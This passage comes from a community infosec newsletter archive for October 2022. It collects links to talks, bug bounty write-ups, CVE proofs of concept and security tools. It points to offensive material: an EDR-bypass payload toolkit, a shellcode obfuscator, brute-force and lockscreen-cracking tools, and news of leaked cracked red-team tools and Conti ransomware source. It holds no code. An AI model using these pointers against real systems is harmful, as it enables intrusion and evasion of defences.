Mentor, then continued with speakers such as Hussein Daher, Nikhil Srivastava, Eugene \"Spaceraccoon\" Lim, Harsh Bothra, @Farah Hawa, Bhavuk Jain etc. We have collected the publicly available slides from the talks in case you missed the event.\n      - [Hussein Daher's slides from his BSides Ahmedabad talk: Bug Bounty On Steroids](https://pr0xy.cc/bsides.pdf)\n      - [The Dark side of Defi](https://docs.google.com/presentation/d/1i1Ski5EcxPczvjdlYAwwditmQFdLAeGEVC59h4Gkx20/edit#slide=id.g149676658b2_0_1169)\n      - [PHP EAR to SQLi](https://docs.google.com/presentation/d/1brq-isjC_2iVINZTvW2-vSO2dNi47Lj9B2SWHLljtAc/edit#slide=id.g1f87997393_0_782)\n      - [The tale of chaining bugs for account takeover](https://speakerdeck.com/harshbothra/tale-of-chaining-bugs-for-account-takeover) by Harsh Bothra\n      - [Pwning Android apps at scale](https://www.canva.com/design/DAFN6i0Z7b4/TW_hNUIkBAdnJc3zmyIRSA/view?utm_content=DAFN6i0Z7b4&utm_campaign=designshare&utm_medium=link2&utm_source=sharebutton)\n      - [How to write your First Nuclei Template?](https://github.com/DhiyaneshGeek/My-Presentation-Slides/blob/main/slides/How-to-write-your-First-Nuclei-Template.pdf)\n \n   - [Nullcon Goa Conference 2022 talk playlist](https://www.youtube.com/watch?v=Ut3yGqqg9W8&list=PLWv48qIcomCZVhwxDnEUmxJ8bfkTQsRPa) \n        > Where you'll find talks and panel discussions such as the CXO panel discussion on Secure Service Edge (SSE): Challenges & Upsides of Adoption, Tzah Pahima's talk Breaking Formation: From an Error Message to Internal AWS Infra, Alexander Popov's findings and viewpoint as a kernel hacker on Fuchsia OS, and Anto Joseph's talk on different bridge designs, their security trade-offs, the vulnerabilities that may exist in these designs, and best practices for end users and developers.\n   \n    - Serialised narration of the tech talks that happened at Nullcon Goa 2022: [Part 1](https://appsecco.com/blog/nullcon-2022-tech-talks-1) and [Part 2](https://appsecco.com/blog/nullcon-2022-tech-talks-compilation-2)\n \n    - [9th Annual Control Systems Cybersecurity Recap : 29th September | UK](https://www.wwt.com/article/infosecurity-europe-2022-recap)\n    - Other cybersecurity events included BruCON 2022 : 29th to 30th September | Mechelen, BE. \n \n  - **Webinars and videos**\n    - Podcast: [Two CISOs discuss the conviction of ex-Uber CISO](https://open.spotify.com/episode/4NqI0eXvLFlb5Dnxc0PdU7) \n       > Andrew Monaghan had Ben Halpert, the CISO of Groupon, and myself on the Sales Bluebird podcast to talk about what the sentencing could mean for the cybersecurity industry.\n    - APIsec University is hosting a live discussion with API security experts from U.S. Bank and WeWork on October 20th at 12pm ET on [The 3 Pillars of API Security: Governance, Testing and Monitoring; you can register here.](https://my.demio.com/ref/8SgjSd5ekemBWh5d)\n    - Recon by Nahamsec, co-hosted by Farah Hawa: [Rhynorater Talks About Grafana SSRF, Picking Bug Bounty Targets, and His Favorite Hacking Tools!](https://www.youtube.com/watch?v=hdp-WDZ9dgw)\n    - In this video series, Mr. Jakoby teaches [PowerShell for hackers](https://www.youtube.com/playlist?list=PL3NRVyAumvmppdfMFMUzMug9Cn_MtF6ub). A total of 21 videos have been uploaded.\n    - [Making $$$ with Clickjacking](https://m.youtube.com/watch?v=kzI6sd02lXc)\n    - In case you missed BSides Ahmedabad, [Veeman has shared an inside look at the event](https://www.youtube.com/watch?v=LzuCyA8MaKo)\n\n\n  - **Ongoing/Upcoming 𝙀𝙑𝙀𝙉𝙏𝙎**:   \n \n    - NetDiligence Cyber Risk Summit : 10th-12th October | Santa Monica\n    - Cyber Security World : 12th to 13th October | Singapore, SG \n    - CISO visions : 17th to 21st October | Virtual – English \n    - Mandiant mWISE Cybersecurity Conference 2022 : 18th-20th October |  Washington DC \n    - E-crime & Cybersecurity London : 19th October | London, UK \n    - 7th Annual Counter Insider Threat Symposium : 19th October | Maryland \n    - IT-SA : 25th to 27th October | Nuremberg, DE \n\n</details> \n \n <details> \n <summary><b> 3. Twitter Threads, News, Announcements & Tips 🟢\n </b></summary>   \n \n - Announcements :\n   - 🟢 Intigriti resumes the [BugBytes newsletter with issue #176 and a new creator, @InsiderPHD](https://blog.intigriti.com/2022/10/05/bug-bytes-176/)\n   - 🟢 Snyk launches a free [code checker](https://snyk.io/code-checker/)\n         > This free code checker can find critical vulnerabilities and security issues with a click, and it integrates with your IDE as well.\n   - 🟢 HackTheBox is [announcing a new certification](https://twitter.com/hackthebox_eu/status/1574422266209005569): HTB Certified Penetration Testing Specialist (HTB CPTS)  \n      > You have to buy a voucher, and each exam voucher includes two (2) exam attempts within a year. \n   - 🟢 SANS [Difference Makers Awards 2022](https://survey.sans.org/jfe/form/SV_bKHZV4Dw9Vje3ye), supporting the humans at work behind the technology.\n      > This year, SANS is partnering with Axonius and with Chris Cochran and Ron Eddings from Hacker Valley Media, as they share our passion for supporting the unsung heroes of cybersecurity and the humans at work behind the technology.\n   - 🟢 Synack is now offering Synack90, a 90-day pentest for businesses.\n  \n - Threads, Resources, News & Tips:\n   - 🟢 InsiderPHD's favourite source on Twitter: [@CVEnew, to keep up to date on recent CVEs](https://twitter.com/CVEnew)\n   - 🟢 Shawn Thomas, Director of Forensics and IR at Yahoo!, created a [thread about preparing a resume](https://twitter.com/understudy77/status/1572397580675600384)\n   - 🟢 Kevin Beaumont confirms that a significant number of Microsoft Exchange servers have been [backdoored through the new zero-days - including a honeypot.](https://twitter.com/GossiTheDog/status/1575580072961982464)\n   - 🟢 @XssMice curated [resources, GitHub repos and tools for firmware security and pentesting](https://twitter.com/XssMice/status/1579872661806514176?t=7MuNf_jhLwP27sQyhGGqSA&s=19)\n   - 🟢 MalwareBazaar updated a [suspicious malware entry on Bumblebee](https://twitter.com/k3dg3/status/1575173131198558208)\n \n</details>  \n \n<details> \n<summary><b> 4. Update on Data Breaches & Black Hat Hacker Leaks 🔴 \n</b></summary> \n   \n - 🔴 **Update - Paid Tools** that have been leaked or cracked by black hat hackers : \n      > Cobaltstrike 4.7.1 Licence, CANVAS 7.27, Invicti Standard 6.7.0.37625, acunetix_14.9.220913107, BurpSuite_pro_v2022_9.1, Acunetix Version 14 build 14.9.220713150 for Windows, Nessus Core + tenableSC 20220307 ISO & Linux, Malcat malware analyzer, xray_1.9.1_windows_x64, WinLicense 3.1.2.0 (x32/x64) Licensed, bruteratel 1.2.2, and 010 Editor 13.0-beta2.\n \n - 🔴 **Update - Black Hat Hacker leaks & activity** : \n     - Source code relating to Intel Alder Lake processors has appeared on the web, posted by a user known as Kingsman.\n        > Intel has confirmed that some of the source code and internal documentation for Alder Lake has been leaked, and clarified that the data from this leak, which has been published in public sources, is genuine.\n     - On 12th October, a tweet from @IANS claimed that\n        > Cybersecurity researchers said they have discovered a massive leak involving over nine million cardholders' financial data that includes customers of the State Bank of India (#SBI).\n     - A Pakistani group on Twitter claims a mega leak of Indian government and military defence data \n        > that includes all kinds of top secret, secret and confidential documents from the following sectors: ALISDA, DGAQA, MSQAA, DRDO, DDP, Joint Defence Secretary India, BSF, MOD and the Indian Navy.\n     - Groups and researchers on Telegram & Discord say that \"AZMA GROUP IS INVOLVED IN CLOSING THE INTERNET AND MONITORING SOCIAL MEDIA ALL OVER IRAN.\" \n     - Researchers have been discussing the *Darknetmarkets bible for buyers* guide, which covers all the steps users have to take in order to buy securely from darknet markets.\n     - Conti v3.7.7 source code and ransomware builder tools have been circulating in private groups, and the Taurus bot source code has been leaked. \n \n</details> \n \n<details> \n<summary><b>\n5. Hiring/Jobs\n</b></summary>\n \n> In this beginner-friendly segment, we talk about and share the latest resources related to jobs this month, interview questions, and free training offered by organizations, communities and leaders.\n \n - 1. Take a look at [Internship/Job Openings in October 2022](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/CyberSecurityJobs/Jobs.md#Weekly-Cybersecurity-Hiring-Aug-2022).\n\n - 2. ResetHacker has collected [interview questions asked by organizations](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/CyberSecurityJobs/InterviewQA.md).\n\n - 3. [Cybersecurity Jobs HelpDesk](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/CyberSecurityJobs/Readme.md)\n \n</details> \n</details> \n\n<span id=\"title-bb\"></span>\n<details> \n<summary><b> 🐞🐞🐞 BUG BOUNTY 🐞🐞🐞  \n \n > Everything related to bug bounty : reports, write-ups and resources👇\n </b></summary>   \n\n <details> \n <summary><b>1. HackerOne/Bugcrowd reports worth reading for bug hunters. </b></summary>\n \n *1. In this segment, we have filtered out the top **HACKERONE/BUGCROWD REPORTS** for bug hunters :*\n   - 🐞 $33,510 on GitLab for [Remote Command Execution via GitHub import](https://hackerone.com/reports/1679624)\n   - 🐞 $1,000 on LinkedIn for [IDOR - Delete technical skill assessment result & Gained Badges result of any user](https://hackerone.com/reports/1592587)\n</details> \n \n<details> \n<summary><b>2. BUG BOUNTY : write-ups, tips & resources. </b></summary>\n \n *2. 
In This Beginners friendly segment, We collect and filter out **BUG BOUNTY WRITEUPS, TIPS & RESOURCES*** \n \n  - **Writeups** :\n    - [What I learnt from reading 220 IDOR bug reports.](https://medium.com/@nynan/what-i-learnt-from-reading-220-idor-bug-reports-6efbea44db7)\n    - [Full Company Building Takeover](https://omar0x01.medium.com/company-building-takeover-10a422385390)\n    - [How Palantir Manages Continuous Vulnerability Scanning at Scale](https://blog.palantir.com/how-palantir-manages-continuous-vulnerability-scanning-at-scale-9fbe25039ff5)\n    - @HasharMujahid wrote a writeup explaining [Multi-Factor Authentication Vulnerabilities](https://infosecwriteups.com/multi-factor-authentication-vulnerabilities-7a4b647a7b09)\n    - An detailed article on [SSRF vulnerabilities and where to find them](https://labs.detectify.com/2022/09/23/ssrf-vulns-and-where-to-find-them/)\n    - [Fuzzing for Bug Bounty Hunting](https://maheshbasnet.medium.com/how-fuzzing-can-boost-you-bug-bounty-career-49e499900aa9)\n    - [Persistent PHP payloads in PNGs: How to inject PHP code in an image – and keep it there](https://www.synacktiv.com/publications/persistent-php-payloads-in-pngs-how-to-inject-php-code-in-an-image-and-keep-it-there.html)\n    - [Exploits Explained: 5 unusual authentication bypass techniques](https://www.synack.com/blog/exploits-explained-5-unusual-authentication-bypass-techniques/)\n    - [TWO LINES OF JSCRIPT FOR $20,000 – PWN2OWN MIAMI 2022](https://trenchant.io/two-lines-of-jscript-for-20000-pwn2own-miami-2022/)\n    - $50K+ bounty for Worldwide [Server-side Cache Poisoning on All Akamai Edge Nodes ](https://medium.com/@jacopotediosi/worldwide-server-side-cache-poisoning-on-all-akamai-edge-nodes-50k-bounty-earned-f97d80f3922b)\n    - [IDOR in GraphQL Query Leaking Private Photos of a Million $ App](https://rashahacks.com/idor-in-graphql-query-leaking-private-photos-of-a-million-app-2c12c7e9dea7)\n \n - **New Resources Found + Non -Technical**\n   - 
@zapstiko curated a Bug bounty [Collected resource from twitter](https://github.com/zapstiko/Bug-Bounty)\n   - [Pentagon bug bounty program turns up nearly 350 vulnerabilities](https://therecord.media/pentagon-bug-bounty-program-turns-up-nearly-350-vulnerabilities/)\n   - TikTok Shop — [User disclosure bug execution](https://medium.com/@Ksecureteamlab/tiktok-shop-user-disclosure-bug-execution-7d1c1302b7cb)\n   - [Cool Job : I(@Arl_rose) Recruit Pentesters for HackerOne](https://www.codecademy.com/resources/blog/cool-coding-job-hackerone-pentesting-community/)\n   - [What does it mean to become an Intigriti partner](https://blog.intigriti.com/2022/10/04/become-intigriti-partner/)\n\n </details> \n \n <details> \n<summary><b>3. Bug Bounty HELPDESK by ResetHacker Community.</summary><b>\n </details> \n \n   - [Bug Bounty FAQ](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/Bugbounty/bugbounty-FAQ.md)\n   - [Bug bounty Setup & hacker daily utiliy](https://github.com/RESETHACKER-COMMUNITY/Resources/blob/main/setup/Readme.md) \n   - [Bug Bounty Resources, recon methodology worldlist, mindmaps, checklists etc](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/tree/main/Bugbounty)\n \n</details> \n\n</details> \n\n \n  <span id=\"title-tools\"></span>\n<details> \n<summary><b> 🛠️🛠️🛠️ NEW TOOLS FOUND 🛠️🛠️🛠️  \n \n > List of tools that satisfy the hacker purpose in every domain.👇\n </b></summary> \n\n> Community members test the tools and we filter out most demanding and helpful tools that satisfy the hacker Purpose in different domains.\n\n<details>\n<summary><b>1. SAST/DAST/IAST/RASP/Recon/Network/Web Pentesting - 6 Tools</b></summary>\n  \n - **1. 
SAST/DAST/IAST/RASP/Recon/Network/Web Pentesting** - 6\n    \n    - [Cpplumber 0.1.0 - Static analysis tool based on clang, which detects source-to-binary information leaks in C and C++ projects.](https://github.com/ergrelet/cpplumber)\n    - [UseReFuzz](https://github.com/root-tanishq/userefuzz) -> SQLI Tester for HTTP Headers, by [Kun](https://twitter.com/root_tanishq)\n    - [Mizusawa](https://github.com/0x727/ShuiZe_0x727) -> Information Gathering Automation Tool.\n    - [WARF](https://github.com/iamnihal/warf) -> A Web Application Reconnaissance Framework that helps to gather information about the target.\n    - [spk aka spritzgebaeck](https://github.com/dhn/spk)\n       >  A small OSINT/Recon tool to find CIDRs that belong to a specific organization]\n    - [dnsReaper](https://github.com/punk-security/dnsReaper) -> subdomain takeover tool for attackers, bug bounty hunters and the blue team!\n</details> \n\n<details>\n<summary><b>2. Cloud Security  - 3 Tools </b></summary>\n \n - **2. Cloud Security** - 3\n     - [CloudFox](https://github.com/BishopFox/cloudfox) -> Automating situational awareness for cloud penetration tests. \n     - [cloudvelo](https://github.com/Velocidex/cloudvelo) -> An experimental Velociraptor implementation using cloud infrastructure.\n     - [Cloudlist](https://github.com/projectdiscovery/cloudlist) -> A multi-cloud tool for getting Assets from Cloud Providers. \n        > This is intended to be used by the blue team to augment Attack Surface Management efforts by maintaining a centralized list of assets across multiple clouds with very little configuration efforts.\n </details> \n\n<details>\n<summary><b>3. Blue/Red/Purple Team, IR and Threat intelligence - 6 Tools </b></summary>\n \n - **3. 
Blue/Red/Purple Team, IR and Threat intelligence Tools** - 5\n     - [Headless Strike](https://github.com/CodeXTF2/cobaltstrike-headless)\n        > It is a Aggressorscript that turns the headless aggressor client into a (mostly) functional cobalt strike client. \n     - [Freeze](https://github.com/optiv/Freeze) is a payload toolkit for bypassing EDRs using suspended processes, direct syscalls, & alternative execution methods.\n     - [fingerprintx is a Standalone utility for service discovery on open ports!](https://github.com/praetorian-inc/fingerprintx)\n     - [Varc - Volatile Artifact Collector](https://github.com/cado-security/varc) \n        > varc collects a snapshot of volatile data from a system. It tells you what is happening on a system, and is of particular use when investigating a security incident.\n     - [LDAP Nom Nom - anonymously bruteforce Active Directory usernames at high speed](https://github.com/lkarlslund/ldapnomnom)\n        > which allows you to anonymously bruteforce Domain Controllers to find usernames in Active Directory at high speeds.\n     - [exploits-predict](https://github.com/wisoffe/exploits-predict) \n        > Predicting the probability of an exploit being released after a CVE is published (by Machine learning algorithm) and this project is based on [Cookiecutter data science project template.](https://drivendata.github.io/cookiecutter-data-science/)\n\n</details> \n\n<details>\n<summary><b>4. Reverse Engineering, Encryption & OSINT - 5 Tools </b></summary> \n \n - **4. 
Reverse Engineering & OSINT Tools** - 4\n     - [Shellcrypt](https://github.com/iilegacyyii/Shellcrypt) \n       > It is a single-file, cross-platform quality-of-life tool to obfuscate a given shellcode file and output it in a useful format for pasting directly into your source code.\n     - A simple [(almost) POSIX shell script for mail security checks](https://github.com/jeffbencteux/mailsecchk)\n     - [PE-bear](https://github.com/hasherezade/pe-bear) is a multiplatform reversing tool for PE files. \n        > Its objective is to deliver a fast and flexible “first view” for malware analysts, stable and capable of handling malformed PE files.\n     - [uosint](https://github.com/uosint-project/uosint) -> Find the profiles of a person on social networks.  \n     - [TRIFECTA](https://github.com/V1XX-1/TRIFECTA-Search-Tool) \n        > A batch script that allows you to search a phrase or keywords with 12 different search engines. You can do so one at a time or all at once.\n\n </details> \n\n<details>\n<summary><b>5. IoT, OS & Hardware - 3</b></summary>   \n \n  - **5. 
IoT, OS & Hardware** - 3\n      \n      - [CiLocks](https://github.com/tegal1337/CiLocks) -> Crack interface lockscreen, Metasploit and more Android/iOS hacking.\n      - [Cotopaxi](https://github.com/Samsung/cotopaxi) \n         > Set of tools for security testing of Internet of Things devices using specific IoT network protocols.\n      - [HKSSY/Drone-Hacking-Tool](https://github.com/HKSSY/Drone-Hacking-Tool) \n         > Drone Hacking Tool is a GUI tool that works with a USB WiFi adapter and HackRF One for hacking drones.\n\n </details> \n</details> \n\n---\n  \n<details>\n<summary> 🤝🤝🤝 Team/Contributors and Community Engagement partners and resources that help in drafting the Weekly Infosec Update.🤝🤝🤝 </summary>\n\n> Huge thanks to our awesome [Community Leaders for contributing and giving back to the community](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/ResetCybersecuirty/SupportedBy/Team%26Contributors.md), and thank you for being part of the team.\n   - Contributors : Good Resources Share, Paul Miller, Tarang Parmar, Tuhin Bose, Vikram and Alexandre ZANNI.\n\n> I'm very grateful to all the [organizations, groups, and communities that support us with engagement](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/ResetCybersecuirty/SupportedBy/CommunityEngagementPartners.md). 
Without their support, distributing the \"Weekly InfoSec Update\" among hackers would not have been possible.\n\n> Resources from [organizations and researchers](https://github.com/RESETHACKER-COMMUNITY/Community-Contributers/blob/main/StayUptoDate.md) that help us in drafting the [Weekly Infosec Update](https://github.com/RESETHACKER-COMMUNITY/Community-Contributers/blob/main/StayUptoDate./md).\n\n </details>\n \n ---\n\n#### Wrapping Up\n <div align=\"\"><br>\n <a href=\"mailto:resethackerofficail@gmail.com?subject=RESETHACKER Community:\" target=\"_blank\"><img src=\"https://img.shields.io/badge/Gmail-D14836?logo=gmail\"></a>\n</div>\nHave questions, suggestions, feedback or want to contribute? Just reply directly by mail (resethackeroffical@gmail.com); I'd love to hear from you.\n\nIf you find this update useful and know other people who would too, I'd really appreciate it if you'd forward it to them. Thanks for reading!\n \n  \n<p align=\"\"><img src=\"https://komarev.com/ghpvc/?username=RESETHACKER-COMMUNITY&label=Profile%20views&color=ce9927&style=flat\" alt=\"Pentesting-Bugbounty//ResetCybersecuirty/\" /> </p> \n"
  },
  {
    "path": "ResetCybersecuirty/Weekly_Infosec_Update(WIU)/Weekly_Infosec_Update_10.md",
    "content": "#### Hey Hackers, I hope you’ve been doing well over the weekend! The quote of the week is \"Don't rush the Process. Good Things Take Time.\"\n > Here is the agenda for *Weekly infosec Update v0.7* : **12th October- 18th October 2022**\n \n![](https://img.shields.io/github/forks/RESETHACKER-COMMUNITY/Pentesting-Bugbounty)\n![](https://img.shields.io/github/stars/RESETHACKER-COMMUNITY/Pentesting-Bugbounty)\n![](https://img.shields.io/github/last-commit/RESETHACKER-COMMUNITY/Pentesting-Bugbounty) \n\n**Tips to SAVE TIME & How to READ this Newsletter? 👇**\n- Select the topic from the **Navbar** below and click on **Summary/Preview** and the **Arrow (>)** to see the details:\n\n- Open all relevant titles in a new tab (Ctrl+Click), then READ them one by one.\n\n[![cve poc](https://img.shields.io/badge/-CVE-%232C4C9C?style=for-the-badge&logo=github&logoColor=black)](#title-cve) [![research & Business](https://img.shields.io/badge/-Research-%232C4C9C?style=for-the-badge&logo=github&logoColor=black)](#title-research) [![beginners](https://img.shields.io/badge/-News-%232C4C9C?style=for-the-badge&logo=github&logoColor=black)](#title-beginners) [![bug bounty](https://img.shields.io/badge/-Bug%20Bounty-%232C4C9C?style=for-the-badge&logo=github&logoColor=black)](#title-bb) [![tools](https://img.shields.io/badge/-Tools-%232C4C9C?style=for-the-badge&logo=github&logoColor=black)](#title-tools) \n\n![WIU_Trail_Pro](https://user-images.githubusercontent.com/25515871/191970244-14b8821b-acd9-4fb6-8e9b-f627392c4715.png)\n \n---\n\n<span id=\"title-cve\"></span>\n### 🪲🪲🪲 CVE : poc exploit and cve analysis 🪲🪲🪲\n\n### Week -> [**12th October- 18th October 2022**👈](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/ResetCybersecuirty/CVE's/Readme.md).\n\n <summary>\nSecurity patched within the week: \n \n   > We have tracked the latest security advisories of top vendors and filtered out the high and critical vulnerabilities that have been patched.\n   > This week, we have 
updates from Apple (iOS), Adobe, Microsoft (55+), GitHub (sqlite3 & aws), Google (Android), Ubuntu 22.04, 20.04 LTS, 18.4.\n</summary>\n\n<summary>\nCVE analysis, writeups and reports: (a total of 6 analyses that matter from the last week)\n \n   > This week, we have collected the recently discovered write-ups for CVEs that have critical or higher severity. \n</summary>\n\n <summary> \n PoC for CVE & exploit (a total of 5+ new 0-days this week and 4 important ones from last week's CVEs) :\n \n   > Every week, we track the recently discovered exploits and PoCs for CVEs.  \n</summary>\n\n<details>\n<summary><b>Summary/Preview</b></summary>\n \n > Week -> [**12th October- 18th October 2022**👈](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/ResetCybersecuirty/CVE's/Readme.md).\n \n\n        \n    CVE:ANALYSIS & POC:             PoC for CVE-2022-40684 & Nuclei template, CVE-2022-41033, CVE-2022-36067, CVE-2021-45067, CVE-2022-42889/ Text4Shell \n                                    and Detailed Report of Top CVEs most used by Chinese state-sponsored cyber actors since 2020 \n\n         \n    CVE POC (0-Day):                CVE-2021-46422 (Google Chrome), CVE-2022-41852, CVE-2021-45067, PoC for CVE-2022-40684 & Nuclei template, \n                                    CVE-2022-41033, Zeroday Microsoft Exchange Server checker (Virtual Patching checker), DropBox-XPC-Exploit,  \n \n\n</details> \n\n---\n\n<span id=\"title-research\"></span>\n### 🔍🔍🔍 RESEARCH, SECURITY & IT ORGANIZATION 🔍🔍🔍\n\n   > In this segment, we have collected this week's relevant and latest articles/whitepapers/research/techniques/resources from all the infosec domains for independent researchers and professionals who want to stay up to date with the latest security, are looking for a new approach to finding CVEs/bugs, or want to track the infosec market and startups. 
\n<details> \n<summary><b>1 - Infosec Business, funded and Market</b></summary> \n \n - **1 - Infosec Business, funded and Market** \n     \n    - According to Mike P, creator of Return on Security, cybersecurity funding continued its downward trend in Q3 2022.\n      > Both overall volume of transactions and total amount of money raised took a hit. What is interesting, however, is that while the total funding volume is down, the average funding round check size is still on par with 2021 to the tune of $29.1M in 2022 compared to $29.8M in 2021. Q4 2021 saw a rebound in transaction volume and money, and based on how October has started, this trend appears to be happening again in 2022.\n    ![image](https://user-images.githubusercontent.com/25515871/196684987-be055136-822b-4293-b99d-cab307e59150.png)\n\n \n    - CISA Releases [Twenty-Five Industrial Control Systems Advisories](https://www.cisa.gov/uscert/ncas/current-activity/2022/10/13/cisa-releases-twenty-five-industrial-control-systems-advisories)\n    - The MRA market report reveals that the [global cloud security market is forecast to surpass $123 billion by 2032](https://www.techrepublic.com/article/cloud-security-market-forecast/)\n    - The Latest [Funding News and What it Means for Cyber Security in 2023](https://thehackernews.com/2022/10/the-latest-funding-news-and-what-it.html)\n    \n    - **Infosec Market Helpdesk**  \n \n       > [Supply chain security Report](https://drive.google.com/file/d/19qUBeq7jGaxP1kWBGaH1XPA6ZbsCpisAG/view?usp=sharing)\n       \n       > [5G Cybersecurity Market to See Incredible Growth By 2022-2028](https://www.openpr.com/news/2753049/5g-cybersecurity-market-to-see-incredible-growth-by-2022-2028)\n       \n       > This research shares insight into the [Indian market and clients, and helps you understand who is the right client for your business](https://drive.google.com/file/d/1yRuIGqb5gcWN_F_tgqHgZA7RuLr34sIS/view?usp=sharing)  \n \n       > Investors and venture capital (VC) for cybersecurity 
STARTUPS :  [Liberty City Ventures](https://www.libertycityventures.com/),  [Evolution Equity](https://evolutionequity.com/),  [M12VC](https://m12.vc/),  [Team8.VC](https://team8.vc/),  [Centerstone Capital](https://www.centerstone.capital/),  [Insight partners](https://www.insightpartners.com/),  [World Trade Venture](http://worldtradeventures.com/), [Menara Venture](https://menaraventures.com/)  etc.\n      \n  </details>\n  \n<details>\n<summary><b> 2. Research/Articles discussed by professionals or independent researchers </b></summary>\n   \n - **1 - Web Security and Android Security**\n \n     - SANS released a survey [Think Like a Hacker: Inside the Minds and Methods of Modern Adversaries | September 2022](https://drive.google.com/file/d/1LiandSv7-TNGpzY5IsUzPNDReDVTiJgl/view?usp=sharing)\n     - Ofer Maor, CTO, Mitiga shows [concern over 2FA and recommends 3FA after the Uber breach](https://www.helpnetsecurity.com/2022/10/11/2fa-is-over-long-live-3fa/)\n     - Exploits Explained: [5 unusual authentication bypass techniques](https://www.synack.com/blog/exploits-explained-5-unusual-authentication-bypass-techniques/)\n     - [What is wrong with Apple Passkeys?](https://medium.com/@arkenoi/what-is-wrong-with-apple-passkeys-1d044072c5a3)\n     - [All Windows versions can now block admin brute-force attacks](https://www.bleepingcomputer.com/news/microsoft/all-windows-versions-can-now-block-admin-brute-force-attacks/)\n\n - **2 - Cloud Security & Automation**\n     - [Snyk announcing the 2022 State of Cloud Security report](https://snyk.io/blog/2022-state-of-cloud-security-report/) \n     - [Cloud security report by Fortinet](https://www.fortinet.com/content/dam/fortinet/assets/analyst-reports/report-2022-cloud-security.pdf)\n     - [GCP Penetration Testing Notes](https://0xd4y.com/2022/10/01/GCP-Penetration-Testing-Notes/)\n     \n  \n - **3 - Blue/Red/Purple/Threat Intelligence Team**\n   - **Blue Team**\n     - [Active Directory Security report 
2022](https://drive.google.com/file/d/19qUBeq7jGaxP1kWBGaH1XPA6ZbsCpisAG/view?usp=sharing)\n     - [Kerberos Diamond and Sapphire Tickets](https://pgj11.com/posts/Diamond-And-Sapphire-Tickets/)\n         > As you may know, among the approaches for persistence in a Windows Active Directory are the well-known techniques Golden Ticket and Silver Ticket. \n     - [Trace Oddity: Methodologies for Data-Driven Traffic Analysis on Tor](https://drive.google.com/file/d/19qUBeq7jGaxP1kWBGaH1XPA6ZbsCpisAG/view?usp=sharing)\n         > The paper presents a new end-to-end (e2e) correlation attack on Tor users, which helps to analyze network traffic more effectively to deanonymize them. To implement the attack, [Tensorflow version 2.2.0](https://pypi.org/project/tensorflow/2.2.0/)\nand [Keras version 2.3.0-tf](https://github.com/keras-team/keras/releases/tag/2.3.0) were used to implement their own deep learning model, as well as a rewrite, for their needs, of [DeepCorr 6](https://github.com/woodywff/deepcorr), which was previously used to implement correlation attacks on Tor. 
\n     \n     - [Building a Holistic Insider Risk Management Program](https://drive.google.com/file/d/1jAlNYwuPdZ-UWlawyTDCqGvRduHFZdDN/view?usp=sharing)\n        > This article explains why companies should think about insider risk as part of their data protection strategy, with a holistic approach that includes the right people, processes, and training, in addition to the appropriate tools.\n     \n   - **Red Team**\n     - [Alchemist: A new attack framework in Chinese for Mac, Linux and Windows](https://blog.talosintelligence.com/2022/10/alchimist-offensive-framework.html)\n         > Cisco Talos has discovered a new single-file command and control (C2) framework the authors call \"Alchimist [sic].\" Talos researchers found this C2 on a server that had a file listing active on the root directory along with a set of post-exploitation tools.\n     - [Transform P3 P4 P5 vulnerabilities to P1](https://www.acceis.fr/transform-p3-p4-p5-vulnerabilities-to-p1/) \n         > Article by ACCEIS explaining how to steal user sessions by chaining low-risk vulnerabilities.\n     - [Hidden DNS resolvers and how to compromise a fully-patched WordPress instance](https://sec-consult.com/blog/detail/melting-the-dns-iceberg-taking-over-your-infrastructure-kaminsky-style/)\n \n  - **4. 
HelpDesk**\n     - [Pentesting HelpDesk](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/PentestingReports/Readme.md) By Resethacker Community\n     - [System Architecture For Cyber Security](https://medium.com/codingwizards/system-architecture-for-cyber-security-b15d09e7869)\n</details>\n\n---\n<span id=\"title-beginners\"></span>\n### Friendly Segment\n   > We have tried to solve the problem \"How to stay up to date with the latest Bug Bounty community without wasting time on social media\". This segment is friendly for intermediate bug hunters and ethical hackers, while the NEWS and TOOLS segments are common to professionals and intermediates.\n  <details> \n  <summary><b>\n📰📰📰 Hacker NEWS 📰📰📰  \n   \n   > Based on hacker requirements, we have reset infosec news into 5 different segments👇\n   </b></summary>   \n\n  <details> \n  <summary><b> 1. Top 6 infosec news</b></summary> \n   \n   - News from Bloomberg says that a US official sees more aggressive cybersecurity threats in Asia.\n   - Germany fires cybersecurity chief 'over Russia ties'\n   - The USA released its [National Security Strategy](https://drive.google.com/file/d/1FdPbmXiQBuWz7hXM3h3S3Ubb09vZgrHK/view?usp=sharing)\n      > It talks about the plans, allies and partners of the USA in every region of the world.\n   - Kaspersky researchers warn that [YoWhatsApp, an unofficial WhatsApp app, spreads the Triada Trojan](https://securityaffairs.co/wordpress/137013/malware/yowhatsapp-fake-whatsapp.html)\n   \n   - India's mobile exports cross 1 billion per month.\n   - More than 7 in 10 cybersecurity incident responders in India say they have experienced extreme or considerable mental strain as a result of responding to a major hacking incident, reveals an IBM study. \n   \n               \n</details> \n \n<details> \n<summary><b> 2. 
Event recap </b></summary>\n \n   > This week, Haxacon 2022 and Nullcon Goa 2022 conference videos & slides were mainly trending among the community, and we have collected publicly available important talks, slides, tools, podcasts, videos and upcoming events related to conferences, talks & webinars so you don't miss them and can watch them at a time that suits you.\n\n - **Conferences**\n \n   - Haxacon 2022 : [Hacking the Cloud With SAML](https://drive.google.com/file/d/19qUBeq7jGaxP1kWBGaH1XPA6ZbsCpisAG-ZZdMXn/view?usp=drivesdk)\n      \n   - [Nullcon Goa Conference 2022 talk playlist](https://www.youtube.com/watch?v=Ut3yGqqg9W8&list=PLWv48qIcomCZVhwxDnEUmxJ8bfkTQsRPa) \n        > Where you'll find talks and panel discussions such as the CXO panel discussion on Secure Service Edge (SSE): Challenges & Upsides of Adoption, Tzah Pahima's talk on Breaking Formation: From an Error Message to Internal AWS Infra, Alexander Popov's findings and viewpoint as a kernel hacker on Fuchsia OS, and Anto Joseph's talk on different bridge designs, their security trade-offs, vulnerabilities that may exist in these 